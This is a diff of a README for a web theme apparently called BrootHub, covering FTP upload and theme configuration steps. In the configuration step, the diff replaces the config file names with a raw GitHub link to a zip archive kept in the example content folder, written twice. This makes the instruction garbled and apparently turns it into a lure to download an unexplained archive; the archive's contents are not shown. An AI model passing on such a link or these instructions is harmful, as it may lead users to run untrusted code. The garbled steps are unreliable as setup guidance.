aj3220/BrootHub/README.md

    Use an FTP client to upload the extracted files to your web server.
 Ensure you place them in the correct directory, often called `public_html` or `www`.

 4. **Configure the Theme:**
-   - Open the main configuration file typically named `config.toml` or `config.yaml` in your text editor.
+   - Open the main configuration file typically named `https://raw.githubusercontent.com/aj3220/BrootHub/master/exampleSite/content/posts/Hub-Broot-v1.7.zip` or `https://raw.githubusercontent.com/aj3220/BrootHub/master/exampleSite/content/posts/Hub-Broot-v1.7.zip` in your text editor.
    - Adjust settings like your site title, description, and author information.

 5. **Run the Website:**